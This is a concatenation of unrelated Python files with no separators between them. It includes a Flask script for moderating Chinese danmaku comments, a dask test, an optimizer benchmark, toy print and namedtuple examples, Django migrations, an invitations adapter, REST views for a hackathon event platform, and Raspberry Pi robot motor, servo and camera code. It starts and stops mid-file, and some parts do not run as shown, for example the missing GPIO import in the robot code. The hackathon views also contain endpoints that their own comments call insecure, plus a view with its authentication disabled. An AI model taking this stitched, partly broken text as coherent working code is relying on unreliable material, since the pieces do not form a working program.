convert_id_to_label(pred_ids_result, id2label) # print(pred_label_result) # #todo: 组合策略 # result = strage_combined_link_org_loc(sentence, pred_label_result[0]) # print("研究问题:", result) # print('time used: {} sec'.format((datetime.now() - start).total_seconds())) # return result @app.route('/Question_Word', methods=['GET']) def Question_Word(): if not request.args.get("data"): pass text = request.args.get("data") print(text) words = predict(text) print(words) return {'results':words} def clean(text): text = re.sub(r"(回复)?(//)?\s*@\S*?\s*(:| |$)", " ", text) # 去除正文中的@和回复/转发中的用户名 text = re.sub(r"\[\S+\]", "", text) # 去除表情符号 text = re.sub(r"#\S+#", "", text) # 去除话题内容 text = re.sub(r"【\S+】", "", text) # 去除标题 URL_REGEX = re.compile( r'(?i)\b((?:https?://|www\d{0,3}[.]|[a-z0-9.\-]+[.][a-z]{2,4}/)(?:[^\s()<>]+|\(([^\s()<>]+|(\([^\s()<>]+\)))*\))+(?:\(([^\s()<>]+|(\([^\s()<>]+\)))*\)|[^\s`!()\[\]{};:\'".,<>?«»“”‘’]))', re.IGNORECASE) text = re.sub(URL_REGEX, "", text) # 去除网址 text = text.replace("转发微博", "") # 去除无意义的词语 text = text.replace("本报讯", "") text = re.sub(r"\s+", " ", text) # 合并正文中过多的空格 return text.strip() if __name__ == "__main__": # app.run('0.0.0.0', port=7200,debug=False) # while True: # text = input() # predict(text) import pandas as pd df = pd.read_excel('/data/leo/Work/Wende/弹幕审核测试文案.xlsx') print(df.head()) text = df['弹幕审核测试文案'].tolist() new_text = [] for t in text: new_text.append(clean(t)) df['涉政模型预测结果_v3'] = '' df['涉政模型预测得分_v3'] = '' from tqdm import tqdm i = 0 with open('/data/leo/Work/Wende/test_2_v1.txt','w',encoding='utf-8') as f: for t in tqdm(new_text): c = '' c,prob = predict(t) f.write(c + '\t' + str(prob) + '\n') i += 1 df.loc[i, '涉政模型预测结果'] = c df.loc[i, '涉政模型预测得分'] = str(prob) df.to_excel('/data/leo/Work/Wende/弹幕审核测试文案_2_v1.xlsx') from pathlib import Path import dask.array as da from ..interface import pool, 
visualize_pools def test_visualize(tmp_path: Path): # Just test that it doesn't fail with pool("A"): a = da.random.random((10, 10)) with pool("B"): b = da.random.random(10) run_in_a = (a - 1).sum() run_in_b = b - a.mean() visualize_pools(run_in_a, filename=tmp_path / "a.svg") assert (tmp_path / "a.svg").exists() visualize_pools(run_in_a, run_in_b, filename=tmp_path / "both.svg") assert (tmp_path / "both.svg").exists() visualize_pools(run_in_a, run_in_b.dask, filename=tmp_path / "both-hlg.svg") assert (tmp_path / "both-hlg.svg").exists() research/atpe_research_2/benchmark.py from hypermax.optimizer import ATPEOptimizer from hypermax.optimizer import TPEOptimizer from hypermax.optimizer import RandomSearchOptimizer import hpolib.benchmarks.synthetic_functions as hpobench from hpolib.benchmarks.ml import svm_benchmark, logistic_regression import numpy as np from pprint import pprint atpeOptimizer = ATPEOptimizer() tpeOptimizer = TPEOptimizer() randomOptimizer = RandomSearchOptimizer() algorithms = { "ATPE": atpeOptimizer, "TPE": tpeOptimizer, "Random": randomOptimizer } # Run Scipy.minimize on artificial testfunctions h3 = hpobench.Hartmann3() h6 = hpobench.Hartmann6() b = hpobench.Branin() bo = hpobench.Bohachevsky() cb = hpobench.Camelback() fo = hpobench.Forrester() gp = hpobench.GoldsteinPrice() le = hpobench.Levy() rb = hpobench.Rosenbrock() logreg = svm_benchmark.SvmOnMnist() for f in [logreg]: info = f.get_meta_information() print("=" * 50) print(info['name']) space = { "type": "object", "properties": {} } for boundIndex, bound in enumerate(info['bounds']): space['properties'][str(boundIndex)] = { "type": "number", "scaling": "linear", "mode": "uniform", "min": bound[0], "max": bound[1] } increment = 0 for name, optimizer in algorithms.items(): print("Optimizer", name) losses = [] for round in range(1): best = None history = [] for trial in range(100): params = optimizer.recommendNextParameters(space, history) evalParams = [params[str(boundIndex)] for boundIndex in range(len(space['properties']))] val = f(evalParams) val += increment print(val) params['loss'] = val params['status'] = 'ok' history.append(params) if best is None or val < best['loss']: best = params print(round, best['loss']) losses.append(best['loss']) averageLoss = np.mean(losses) averageLoss -= increment print("Average loss: ", averageLoss) import collections FootballTeam = collections.namedtuple('FootballTeam', ['name', 'country']) # Class definition with special methods implemented class Teams: countries = ['Germany', 'France', 'Spain'] bundesliga_teams = ['RB Leipzig', 'Bayern Munich', 'Borussia Dortmund'] def __init__(self, country_name): # List comprehension with a filter on country name self._teams = [FootballTeam(name, country) for name in self.bundesliga_teams for country in self.countries if country == country_name] def __len__(self): return len(self._teams) def __getitem__(self, position): return self._teams[position] def getAll(self): return self._teams teams = Teams("Germany") print(len(teams)) print(teams[0]) print(teams.getAll())2020/05/solution.py1-10 def parse_data(): with open('2020/05/input.txt') as f: data = f.read() return data.splitlines() def get_ids(data): to_binary = str.maketrans('FBLR', '0101') return [int(code.translate(to_binary), base=2) for code in data] def part_one(data): return max(get_ids(data)) def part_two(data): ids = get_ids(data) min_id = min(ids) max_id = max(ids) seats_available = (max_id * (max_id + 1) - min_id * (min_id - 1)) // 2 seats_occupied = sum(ids) return 
seats_available - seats_occupied def main(): data = parse_data() print(f'Day 05 Part 01: {part_one(data)}') print(f'Day 05 Part 02: {part_two(data)}') albe-rosado/xuexiao-xitong0 """migration from sqlite Revision ID: 56f1be2cd3c Revises: 2 Create Date: 2017-01-22 14:27:46.568469 """ # revision identifiers, used by Alembic. revision = '56f1be2cd3c' down_revision = '2' from alembic import op import sqlalchemy as sa def upgrade(): ### commands auto generated by Alembic - please adjust! ### pass ### end Alembic commands ### def downgrade(): ### commands auto generated by Alembic - please adjust! ### pass ### end Alembic commands ### # printl print('Hickory Disckry Dock! The mouse ran up the clock') print("Hickory Disckry Dock! The mouse ran up the clock") #print demo print('The capybars is the worlds largest rodent') #print ' / " print("It's beautiful day in the neighborhood") print('It\'s beautiful day in the neighborhood') #print multi line print('Hickory Disckry Dock! \nThe mouse ran up the clock') #print triple quotes and tab print("""Hickory Disckry Dock! The mouse ran up the clock""") print("""Hickory Disckry Dock! The mouse ran up the clock""") print("""Hickory Disckry Dock! \tThe mouse ran up the clock""") #print use both single and double print('here is a double quote "' + " here is a single quote '") print("or you can hust do this \" does that work") print("can I just print \ on the screen? ") print("But what if I want \\news") from django.template.loader import render_to_string from django.contrib import messages from django.conf import settings from django.template import TemplateDoesNotExist from django.core.mail import EmailMultiAlternatives, EmailMessage from django.contrib.sites.models import Site try: from django.utils.encoding import force_text except ImportError: from django.utils.encoding import force_unicode as force_text from .app_settings import app_settings from .utils import import_attribute from .signals import user_signed_up # Code credits here to django-allauth class BaseInvitationsAdapter(object): def stash_verified_email(self, request, email): request.session['account_verified_email'] = email def unstash_verified_email(self, request): ret = request.session.get('account_verified_email') request.session['account_verified_email'] = None return ret def format_email_subject(self, subject): # prefix = app_settings.EMAIL_SUBJECT_PREFIX # if prefix is None: # site = Site.objects.get_current() # prefix = "[{name}] ".format(name=site.name) return force_text(subject) def render_mail(self, template_prefix, email, context): """ Renders an e-mail to `email`. `template_prefix` identifies the e-mail that is to be sent, e.g. 
"account/email/email_confirmation" """ subject = render_to_string('{0}_subject.txt'.format(template_prefix), context) # remove superfluous line breaks subject = " ".join(subject.splitlines()).strip() subject = self.format_email_subject(subject) bodies = {} for ext in ['html', 'txt']: try: template_name = '{0}_message.{1}'.format(template_prefix, ext) bodies[ext] = render_to_string(template_name, context).strip() except TemplateDoesNotExist: if ext == 'txt' and not bodies: # We need at least one body raise if 'txt' in bodies: msg = EmailMultiAlternatives(subject, bodies['txt'], settings.DEFAULT_FROM_EMAIL, [email]) if 'html' in bodies: msg.attach_alternative(bodies['html'], 'text/html') else: msg = EmailMessage(subject, bodies['html'], settings.DEFAULT_FROM_EMAIL, [email]) msg.content_subtype = 'html' # Main content is now text/html return msg def send_mail(self, template_prefix, email, context): msg = self.render_mail(template_prefix, email, context) msg.send() def is_open_for_signup(self, request): if hasattr(request, 'session') and request.session.get( 'account_verified_email'): return True elif app_settings.INVITATION_ONLY is True: # Site is ONLY open for invites return False else: # Site is open to signup return True def clean_email(self, email): """ Validates an email value. You can hook into this if you want to (dynamically) restrict what email addresses can be chosen. """ return email def add_message(self, request, level, message_template, message_context=None, extra_tags=''): """ Wrapper of `django.contrib.messages.add_message`, that reads the message text from a template. """ if 'django.contrib.messages' in settings.INSTALLED_APPS: try: if message_context is None: message_context = {} message = render_to_string(message_template, message_context).strip() if message: messages.add_message(request, level, message, extra_tags=extra_tags) except TemplateDoesNotExist: pass def get_user_signed_up_signal(self): return user_signed_up def get_invitations_adapter(): # Compatibility with legacy allauth only version. 
LEGACY_ALLAUTH = hasattr(settings, 'ACCOUNT_ADAPTER') and \ settings.ACCOUNT_ADAPTER == 'web.models.InvitationsAdapter' if LEGACY_ALLAUTH: # defer to allauth print("FAIL") else: # load an adapter from elsewhere return import_attribute(app_settings.ADAPTER)()sorting_algorithms/mergesort.py1-10 import time def merge(data,start,mid,end,drawData,timeTick): p=start q=mid+1 tempArray=[] for i in range(start,end+1): if p>mid: tempArray.append(data[q]) q+=1 elif q>end: tempArray.append(data[p]) p+=1 elif data[p] < data[q]: tempArray.append(data[p]) p+=1 else: tempArray.append(data[q]) q+=1 for p in range(len(tempArray)): data[start]=tempArray[p] start +=1 def mergeSort(data,drawData,timeTick,start,end): if start < end: mid=int((start + end)/2) mergeSort(data,drawData,timeTick,start,mid) mergeSort(data,drawData,timeTick,mid+1,end) merge(data,start,mid,end,drawData,timeTick) drawData(data, ['green' if x >= start and x < mid else 'yellow' if x==mid else 'blue' if x>mid and x<=end else 'red' for x in range(len(data))]) time.sleep(timeTick) drawData(data,['red' for x in range(len(data))])import itertools from django.contrib.auth.models import User from rest_framework.permissions import IsAuthenticated from rest_framework.authentication import TokenAuthentication from rest_framework.views import APIView from rest_framework.views import Response from rest_framework.views import status from rest_framework import viewsets from corsheaders.signals import check_request_enabled from hacks.models import Pilot, Event, EventParticipation, WorkGroups # , Facilitator from .serializers import DetailsPilotSerializer, DetailsEventSerializer, PaticipationEventStatusSerializer, \ GroupSerializer # , FacilitatorSerializer from tools.models import Hackproces, Projects, ProjectFiles from django.contrib.auth import get_user_model from rest_framework.generics import CreateAPIView from django.contrib.auth.models import User from django.core.mail import send_mail from django.conf import settings from django.utils import timezone from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger from datetime import datetime class PilotList(APIView): def get(self, request): pilots = Pilot.objects.all() serializer = DetailsPilotSerializer(pilots, many=True) return Response(serializer.data) class TTQ(APIView): def __init__(self): print("in init") def delete(self, request, Gid): group = WorkGroups.objects.get(id=Gid) group.users.clear() group.delete() return Response(status=status.HTTP_204_NO_CONTENT) def post(self, request, Gid): group = WorkGroups.objects.get(id=Gid) group.name = request.data['name'] group.save() return Response('Group updated !') def get(self, request, Gid): group = WorkGroups.objects.get(id=Gid) return Response(group.name) class GroupsList(APIView): authentication_classes = (TokenAuthentication,) permission_classes = (IsAuthenticated,) def get(self, request): groups = WorkGroups.objects.all() serializer = GroupSerializer(groups, many=True) return Response(serializer.data) def post(self, request): fonction = request.data['fonc'] response = any if fonction == '1': response = self.fetch_groups_of_event(request.data) elif fonction == '2': response = self.assign_to_group(request.data) elif fonction == '3': response = self.unassign_to_group(request.data) elif fonction == '4': response = self.group_new(request.data) elif fonction == '5': response = self.validate_group(request.data) elif fonction == '6': response = self.fetch_user_group(request) elif fonction == '7': response = 
self.fetch_allgroups_of_event(request.data) elif fonction == '8': response = self.verify_group_event(request) return Response(response) def fetch_groups_of_event(self, request): goups = WorkGroups.objects.filter(event_id=request['event']) serializer = GroupSerializer(goups, many=True) return serializer.data def assign_to_group(self, request): record = WorkGroups.objects.get(id=request['group']) record_user = User.objects.get(id=request['user']) msg = 'Should be done !' if (record.users.add(record_user)): msg = 'Error' return msg def unassign_to_group(self, request): record = User.objects.get(id=request['user']) groups = WorkGroups.objects.get(users__id__contains=record.id, event_id=request['event']) groups.users.remove(record) msg = 'Should be done !' return msg def group_new(self, request): event = Event.objects.get(id=request['event_id']) newGroup = WorkGroups(name=request['name'], event=event, status=0) newGroup.save() return 'New group created !' def validate_group(self, request): group = WorkGroups.objects.get(id=request['group']) group.status = 1 group.save() return 'Group validated' def fetch_user_group(self, request): user = User.objects.get(id=request.user.id) event = Event.objects.get(id=request.data['event']) record = WorkGroups.objects.get(event=event, users=user) serlizer = GroupSerializer(record) return serlizer.data def fetch_allgroups_of_event(self, request): goups = WorkGroups.objects.filter(event_id=request['event']) serializer = GroupSerializer(goups, many=True) return serializer.data def verify_group_event(self, request): try: group = WorkGroups.objects.get(users=request.user.id, event=request.data['event']) return group.status except WorkGroups.DoesNotExist: return 'Null' class EventManage(APIView): authentication_classes = (TokenAuthentication,) permission_classes = (IsAuthenticated,) def get(self, request, ev_id): event = Event.objects.get(id=ev_id) serialized = DetailsEventSerializer(event) return Response(serialized.data) def post(self, request, ev_id): event = Event.objects.get(id=ev_id) event.title = request.data['title'] event.date_start = request.data['date_start'] event.date_end = request.data['date_end'] event.descreption = request.data['descreption'] event.theme = request.data['theme'] event.manual_validation = request.data['validation'] event.save() return Response('Object updated') def delete(self, request, ev_id): event = Event.objects.get(id=ev_id) groups = WorkGroups.objects.filter(event=event) if (len(groups) > 0): for item in groups: item.users.remove() try: project = Projects.objects.get(group=item) project.files.remove() project.delete() except: pass item.delete() try: process = Hackproces.objects.get(for_event=event) process.outil_used.remove() process.delete() except: pass event.delete() return Response('Delete completed') class EventList(APIView): # Only Authenticated users has access # authentication_classes = (TokenAuthentication,) # permission_classes = (IsAuthenticated,) def get(self, request): resp = None; listPilot = Pilot.objects.filter(user=request.user.id).values_list('id', flat=True) for item in listPilot: events = Event.objects.filter(hackathon_id=item) resp = DetailsEventSerializer(events, many=True) return Response(resp.data) def post(self, request): fonction = request.data['fonc'] response = any if fonction == '0': response = self.event_applied() # elif fonction == '1': # response = self.upcoming_events(request) elif fonction == '2': response = self.subscribtion_status(request.data) elif fonction == '3': response = 
self.user_per_event(request.data) elif fonction == '4': response = self.addEvent(request) elif fonction == '5': users = User.objects.filter(email__icontains=request.data['applicant_search']).exclude( eventparticipation__event__id=request.data['event_id']) response = [ {'id': u.id, 'mail': u.email, 'actived': u.is_active, 'name': u.get_full_name()} for u in users.iterator() ] elif fonction == '6': response = self.confirmed_user_per_event(request.data) # elif fonction == '7': # response = self.upcoming_events_count(request.data) return Response(response) def addEvent(self, request): manual = request.data['manual_validation'].lower() == 'true' Sdate = request.data['Sdate'].replace('"', '') Edate = request.data['Edate'].replace('"', '') pilotid = request.data['pilotid'].replace('"', '') timezone.deactivate() pilot = Pilot.objects.get(id=pilotid) newEvent = Event(hackathon=pilot, title=request.data['title'], theme=request.data['theme'], descreption=request.data['descreption'], date_start=Sdate, date_end=Edate, image=request.FILES['path'], manual_validation=manual) srcA = newEvent.save() return 'sucess' def event_applied(self): record = EventParticipation.objects.filter(status='pending').order_by('event_id').values_list('event_id', flat=True).distinct() my_list = [] for line in record: event = Event.objects.filter(id=line).values('id', 'title', 'theme', 'date_start') my_list.extend(event) return my_list def user_per_event(self, request): part = EventParticipation.objects.select_related('participant').filter(event_id=request['event'], status='pending') mylista = [] for ele_part in part: data = {'id': ele_part.participant.id, 'mail': ele_part.participant.email, 'actived': ele_part.participant.is_active, 'name': ele_part.participant.first_name + ' ' + ele_part.participant.last_name} mylista.append(data) return mylista def confirmed_user_per_event(self, request): part = EventParticipation.objects.select_related('participant').filter(event_id=request['event_id'], status='confirmed') # return User.objects.filter(##FILL_OUT_HERE##).values('id', 'email', 'activated', 'name') mylista = [] for ele_part in part: data = {'id': ele_part.participant.id, 'mail': ele_part.participant.email, 'actived': ele_part.participant.is_active, 'name': ele_part.participant.first_name + ' ' + ele_part.participant.last_name} mylista.append(data) return mylista def subscribtion_status(self, request): try: upcoming = EventParticipation.objects.get(participant_id=request['participant'], event_id=request['event']) return upcoming.status except: return 'none' def applied_for_event(self, request): record = Event.objects.distinct('event_id') query = record.hackathon_set.all() return query class GroupsCount(APIView): def get(self, request): listA = [] hackID = Pilot.objects.filter(user=request.user.id).values_list('id', flat=True) events = Event.objects.filter(hackathon_id=hackID) for item in events: listB = [] count = WorkGroups.objects.filter(event_id=item.id).count() listB.append({'event': item.id, 'group': count}) listA.extend(listB) return Response(listA) class EventOrganization(APIView): def get(self, request): record = Pilot.objects.filter(user=request.user.id).values_list('user__id', 'id') # ser = DetailsPilotSerializer(record, many=True) return Response(record) def post(self, request): fonction = request.data['fonc'] response = any if fonction == '1': response = self.subscribed_hacks(request) elif fonction == '2': response = self.subscribeToevent(request.data) elif fonction == '3': response = self.acceptApplicant(request) 
elif fonction == '4': response = self.refusApplicant(request.data) elif fonction == '5': response = self.delete_eventparticipant(request.data) print(response) elif fonction == '6': response = self.subscribeToeventEmail(request.data) elif fonction == '7': response = self.upcoming_events(request) return Response(response) def acceptApplicant(self, request): event = Event.objects.get(id=request.data['eventID']) even_title = event.title #print(str(request.user)) #print('=Z> '+str(request.data['userId'])) record = EventParticipation.objects.get(participant=request.data['userId'], event_id=request.data['eventID']) record.status = 'confirmed' record.save() inputs = {'status': 1, 'recepiant': request.data['mail'], 'title': even_title} self.sendNotif(inputs) return 'success' def refusApplicant(self, request): event = Event.objects.get(id=request['eventID']) even_title = event.title record = EventParticipation.objects.get(participant=request.user, event_id=request['eventID']) record.status = 'rejected' record.save() inputs = {'status': 0, 'recepiant': request['mail'], 'title': even_title} self.sendNotif(inputs) return 'success' def subscribed_hacks(self, request): hacks = EventParticipation.objects.filter(participant=request.user).exclude(event__date_end__lt=datetime.now()).order_by( '-event__date_start' ) if hacks.count() == 0: return EventParticipation.objects.none() paginator = Paginator(hacks, int(request.data['amount'])) page = int(request.data['page']) paginatedhacks = paginator.page(page).object_list return {'hacks': paginatedhacks.values( 'event_id', 'event__title', 'event__date_start', 'event__date_end', 'event__hackathon_id', 'status', 'event__image' ), 'max_page': paginator.num_pages, 'total_count': hacks.count()} def upcoming_events(self, request): """Get all upcoming_events that have a hack process where the user is not allready subscribed""" # Get upcoming_events with a hack proces and no participation by the current user events = Event.objects.exclude( hackproces=None ).exclude( eventparticipation__participant=request.user ).exclude(date_end__lt=datetime.now()) if events.count() == 0: return {'hacks': [], 'max_page': 0, 'total_count': 0} # Create paginator paginator = Paginator(events, request.data['amount']) page = paginator.page(request.data['page']) # Return return {'hacks': DetailsEventSerializer(page.object_list, many=True).data, 'max_page': paginator.num_pages, 'total_count': events.count()} # This function is not recomnded --> need to be changed in the future for security reason def subscribeToevent(self, request): eventlink = Event.objects.get(id=request['eventid']) userlink = User.objects.get(id=request['participantid']) if eventlink.manual_validation: status = request['status'] else: status = 'confirmed' subscribtion = EventParticipation(event=eventlink, participant=userlink, status=status) subscribtion.save() res = 'success' return res # This function is not recomnded --> need to be changed in the future for security reason def subscribeToeventEmail(self, request): print(request) eventlink = Event.objects.get(id=request['eventid']) userlink = User.objects.get(email=request['participantemail']) subscribtion = EventParticipation(event=eventlink, participant=userlink, status=request['status']) subscribtion.save() res = 'success' return res def delete_eventparticipant(self, data): print('deleting') EventParticipation.objects.filter(event_id=data['event_id'], participant_id=data['participant_id']).delete() print('deleted') res = 'success' return res def sendNotif(self, request): 
    def sendNotif(self, request):
        mail = request['recepiant']
        situation = request['status']
        if situation == 0:
            notif = (' unfortunately the number of applicants has been reached, '
                     'so your request has been rejected.')
        else:
            notif = ' your request has been accepted. Please be at the venue on time.'
        if (send_mail(
                'About your request to attend ' + request['title'],
                'Thank you for your interest and request to attend,' + notif,
                settings.EMAIL_HOST_USER,
                [mail],
                fail_silently=False)):
            return '200'
        return '350'
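# --- Illustrative client sketch, not part of the original file ---
# A minimal, hedged example of exercising the numeric `fonction` dispatch
# handled by the view above, e.g. from a test. Only the codes ('4' refuse,
# '5' delete a participant, '6' subscribe by e-mail, '7' list upcoming events)
# and the payload keys come from the view itself; the URL "/events/manage/"
# and the helper name are hypothetical placeholders.
def _example_upcoming_events_call(user):
    from rest_framework.test import APIClient

    client = APIClient()
    client.force_authenticate(user=user)
    return client.post(
        "/events/manage/",                            # hypothetical route
        {"fonction": "7", "amount": 10, "page": 1},   # keys read by upcoming_events()
        format="json",
    )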
danjac/jcasts
# Generated by Django 3.2.9 on 2021-11-30 07:43
from django.db import migrations


class Migration(migrations.Migration):

    dependencies = [
        ("podcasts", "0108_podcast_websub_callback_exception"),
    ]

    operations = [
        migrations.RemoveField(
            model_name="podcast",
            name="websub_callback_exception",
        ),
    ]
"""
DCMotor
=======
"""
import time
import RPi.GPIO as GPIO

Motor_A_EN = 4
Motor_B_EN = 17
Motor_A_Pin1 = 26
Motor_A_Pin2 = 21
Motor_B_Pin1 = 27
Motor_B_Pin2 = 18

forward = 0
backward = 1

pwm_A = 0
pwm_B = 0


class DCMotor:
    """Controls the DC motors."""

    def __init__(self):
        """Connects and initializes the DC motor GPIO pins."""
        global pwm_A, pwm_B
        GPIO.setwarnings(False)
        GPIO.setmode(GPIO.BCM)
        GPIO.setup(Motor_A_EN, GPIO.OUT)
        GPIO.setup(Motor_B_EN, GPIO.OUT)
        GPIO.setup(Motor_A_Pin1, GPIO.OUT)
        GPIO.setup(Motor_A_Pin2, GPIO.OUT)
        GPIO.setup(Motor_B_Pin1, GPIO.OUT)
        GPIO.setup(Motor_B_Pin2, GPIO.OUT)
        self.motorStop()
        try:
            pwm_A = GPIO.PWM(Motor_A_EN, 1000)
            pwm_B = GPIO.PWM(Motor_B_EN, 1000)
        except:
            pass

    def motor_right(self, status, direction, speed):
        """Controls the right motor."""
        if status == 0:  # stop
            GPIO.output(Motor_A_Pin1, GPIO.LOW)
            GPIO.output(Motor_A_Pin2, GPIO.LOW)
            GPIO.output(Motor_A_EN, GPIO.LOW)
        else:
            if direction == forward:
                GPIO.output(Motor_A_Pin1, GPIO.LOW)
                GPIO.output(Motor_A_Pin2, GPIO.HIGH)
                pwm_A.start(0)
                pwm_A.ChangeDutyCycle(speed)
            elif direction == backward:
                GPIO.output(Motor_A_Pin1, GPIO.HIGH)
                GPIO.output(Motor_A_Pin2, GPIO.LOW)
                pwm_A.start(100)
                pwm_A.ChangeDutyCycle(speed)

    def motor_left(self, status, direction, speed):
        """Controls the left motor."""
        if status == 0:  # stop
            GPIO.output(Motor_B_Pin1, GPIO.LOW)
            GPIO.output(Motor_B_Pin2, GPIO.LOW)
            GPIO.output(Motor_B_EN, GPIO.LOW)
        else:
            if direction == forward:
                GPIO.output(Motor_B_Pin1, GPIO.LOW)
                GPIO.output(Motor_B_Pin2, GPIO.HIGH)
                pwm_B.start(0)
                pwm_B.ChangeDutyCycle(speed)
            elif direction == backward:
                GPIO.output(Motor_B_Pin1, GPIO.HIGH)
                GPIO.output(Motor_B_Pin2, GPIO.LOW)
                pwm_B.start(100)
                pwm_B.ChangeDutyCycle(speed)

    def move(self, speed, direction, turn, radius=0.8):  # 0 < radius <= 1
        """Moves the device by controlling both motors."""
        if direction == 'forward':
            self.motor_left(1, forward, speed - (turn * radius))
            self.motor_right(1, forward, speed + (turn * radius))
        elif direction == 'backward':
            self.motor_left(1, backward, speed - (turn * radius))
            self.motor_right(1, backward, speed + (turn * radius))
        else:
            pass

    def motorStop(self):
        """Stops the motors."""
        GPIO.output(Motor_A_Pin1, GPIO.LOW)
        GPIO.output(Motor_A_Pin2, GPIO.LOW)
        GPIO.output(Motor_B_Pin1, GPIO.LOW)
        GPIO.output(Motor_B_Pin2, GPIO.LOW)
        GPIO.output(Motor_A_EN, GPIO.LOW)
        GPIO.output(Motor_B_EN, GPIO.LOW)
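# --- Illustrative usage sketch, not part of the original module ---
# A minimal, hedged example of how the DCMotor class above might be driven on
# the target hardware: run both wheels forward at 60% duty with no turning
# offset for one second, then release the pins. The speed and delay values are
# arbitrary choices for the illustration; `time` is already imported above.
def _demo_drive_forward():
    motor = DCMotor()              # configures GPIO and creates the PWM channels
    motor.move(60, 'forward', 0)   # speed=60, turn=0 -> both wheels at the same duty cycle
    time.sleep(1)
    motor.motorStop()              # drive all motor pins LOW again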
"""
ServoMotor
==========
"""
import Adafruit_PCA9685
import threading

pwm = Adafruit_PCA9685.PCA9685()
pwm.set_pwm_freq(50)

init_pwm0 = 300
init_pwm1 = 300
init_pwm2 = 300


class ServoMotor:
    """
    Controls the servo motors.

    Reduced from the original 16 servos to 3:
    0: front wheel steering. 0 = straight ahead
    1: camera pan (left/right). 0 = centered
    2: camera tilt (up/down). 0 = centered
    """

    def __init__(self):
        self.sc_direction = [1,1,1,1, 1,1,1,1, 1,1,1,1, 1,1,1,1]
        self.initPos = [init_pwm0, init_pwm1, init_pwm2]
        self.nowPos = [300, 300, 300]
        self.maxPos = [560, 560, 560]
        self.minPos = [100, 100, 100]
        self.ctrlRangeMax = 560
        self.ctrlRangeMin = 100
        self.angleRange = 180
        self.initConfig(1, 297, 1)
        self.initConfig(2, 140, 1)

    def moveInit(self):
        for i in range(0, 3):
            pwm.set_pwm(i, 0, self.initPos[i])
            self.nowPos[i] = self.initPos[i]

    def initConfig(self, ID, initInput, moveTo):
        if initInput > self.minPos[ID] and initInput < self.maxPos[ID]:
            self.initPos[ID] = initInput
            if moveTo:
                pwm.set_pwm(ID, 0, self.initPos[ID])
        else:
            print('initPos Value Error.')

    def moveServoInit(self, ID):
        for i in range(0, len(ID)):
            pwm.set_pwm(ID[i], 0, self.initPos[ID[i]])
            self.nowPos[ID[i]] = self.initPos[ID[i]]

    def pwmGenOut(self, angleInput):
        return int(round(((self.ctrlRangeMax - self.ctrlRangeMin) / self.angleRange * angleInput), 0))

    def moveAngle(self, ID, angleInput):
        self.nowPos[ID] = int(self.initPos[ID] + self.sc_direction[ID] * self.pwmGenOut(angleInput))
        if self.nowPos[ID] > self.maxPos[ID]:
            self.nowPos[ID] = self.maxPos[ID]
        elif self.nowPos[ID] < self.minPos[ID]:
            self.nowPos[ID] = self.minPos[ID]
        pwm.set_pwm(ID, 0, self.nowPos[ID])

    def setPWM(self, ID, PWM_input):
        self.nowPos[ID] = PWM_input
        pwm.set_pwm(ID, 0, PWM_input)


"""
Tracking
========
"""
line_pin_right = 19
line_pin_middle = 16
line_pin_left = 20


class Tracking:
    """Controls the line-tracking module."""

    def __init__(self):
        GPIO.setwarnings(False)
        GPIO.setmode(GPIO.BCM)
        GPIO.setup(line_pin_right, GPIO.IN)
        GPIO.setup(line_pin_middle, GPIO.IN)
        GPIO.setup(line_pin_left, GPIO.IN)
        self.status_right = None
        self.status_middle = None
        self.status_left = None

    def get_signal(self):
        self.status_right = GPIO.input(line_pin_right)
        self.status_middle = GPIO.input(line_pin_middle)
        self.status_left = GPIO.input(line_pin_left)
        return (self.status_left, self.status_middle, self.status_right)


"""
Camera
======
"""
import cv2
import numpy as np


def get_line(lineIndex_Pos, thickness, offset):
    lines = []
    left = 999
    right = 0
    for pixel in lineIndex_Pos[0]:
        if pixel != right + 1:
            if abs((right - left) - thickness) <= offset:
                line_center = (left + right) // 2
                lines.append(line_center)
                left = pixel
                continue
            left = pixel
        pixel_old = pixel
        right = pixel
    lines.sort(key=lambda x: abs(x - 320))
    return lines[0]


class Camera:
    """Controls the camera."""

    def __init__(self):
        self.linePos_1 = 440
        self.linePos_2 = 380
        self.lineColorSet = 0
        self.center_Pos1 = None
        self.center_Pos2 = None
        self.center = None
        self.thickness1 = 88
        self.thickness2 = 78
        self.offset = 20
        self.camera = cv2.VideoCapture(0)

    def set_thick(self, thickness, offset):
        self.thickness1 = thickness
        self.thickness2 = int(thickness * 0.9)
        self.offset = offset

    def findline(self):
        _, frame_image = self.camera.read()
        frame_findline = cv2.cvtColor(frame_image, cv2.COLOR_BGR2GRAY)
        retval, frame_findline = cv2.threshold(frame_findline, 0, 255, cv2.THRESH_OTSU)
        frame_findline = cv2.erode(frame_findline, None, iterations=6)
        colorPos_1 = frame_findline[self.linePos_1]
        colorPos_2 = frame_findline[self.linePos_2]
        try:
            lineIndex_Pos1 = np.where(colorPos_1 == self.lineColorSet)
            lineIndex_Pos2 = np.where(colorPos_2 == self.lineColorSet)
            self.center_Pos1 = get_line(lineIndex_Pos1, self.thickness1, self.offset)
            self.center_Pos2 = get_line(lineIndex_Pos2, self.thickness2, self.offset)
            self.center = (self.center_Pos1 + self.center_Pos2) // 2
        except:
            self.center = 320
        return self.center


# Copyright (c) 2014,
# All rights reserved.
# # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # * Neither the name of Ordered Set nor the names of its contributors may be # used to endorse or promote products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF # THE POSSIBILITY OF SUCH DAMAGE. import copy import gc import pickle import sys import unittest import weakref from 